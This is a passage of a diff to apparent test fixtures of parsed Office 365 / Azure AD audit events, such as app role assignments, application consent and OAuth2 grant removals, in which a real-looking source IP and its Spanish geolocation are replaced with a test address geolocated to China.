+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4735,8 +4675,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4751,7 +4691,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 152295,
+ "log.offset": 152235,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4780,9 +4720,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -4874,20 +4814,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -4898,8 +4836,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -4914,7 +4852,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 157445,
+ "log.offset": 157383,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -4943,9 +4881,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5037,20 +4975,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -5061,8 +4997,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:05.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add app role assignment to service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -5077,7 +5013,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 162595,
+ "log.offset": 162531,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -5106,9 +5042,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:05",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5200,20 +5136,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -5224,8 +5158,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Consent to application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -5240,7 +5174,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 167745,
+ "log.offset": 167679,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -5269,9 +5203,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5364,20 +5298,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -5388,8 +5320,8 @@
 },
 {
 "@timestamp": "2020-02-09T18:26:06.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Consent to application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -5404,7 +5336,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 172525,
+ "log.offset": 172457,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -5433,9 +5365,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T18:26:06",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5528,20 +5460,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -5569,7 +5499,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "support.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 177305,
+ "log.offset": 177235,
 "o365.audit.Actor": [
 {
 "ID": "00000000-0000-0000-0000-000000000000",
@@ -5694,8 +5624,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:16:18.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -5710,7 +5640,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 181962,
+ "log.offset": 181892,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -5739,9 +5669,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:16:18",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5833,20 +5763,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -5857,8 +5785,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:16:18.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -5873,7 +5801,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 187354,
+ "log.offset": 187282,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -5902,9 +5830,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:16:18",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -5996,20 +5924,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6020,8 +5946,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:16:18.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove OAuth2PermissionGrant.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6036,7 +5962,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 192746,
+ "log.offset": 192672,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6065,9 +5991,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:16:18",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6159,20 +6085,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6183,8 +6107,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:00.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6199,7 +6123,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 198138,
+ "log.offset": 198062,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6228,9 +6152,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:00",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6322,20 +6246,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6346,8 +6268,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:00.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6362,7 +6284,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 203293,
+ "log.offset": 203215,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6391,9 +6313,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:00",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6485,20 +6407,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6509,8 +6429,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:00.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Remove app role assignment from service principal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6525,7 +6445,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 208491,
+ "log.offset": 208411,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6554,9 +6474,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:00",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6648,20 +6568,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6672,8 +6590,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:00.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Add a deletion-marked app role assignment grant to service principal as part of link removal.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -6688,7 +6606,7 @@
 "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "host.name": "testsiem.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 213646,
+ "log.offset": 213564,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -6717,9 +6635,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-10T15:17:00",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -6811,20 +6729,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
@@ -6835,8 +6751,8 @@
 },
 {
 "@timestamp": "2020-02-10T15:17:00.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
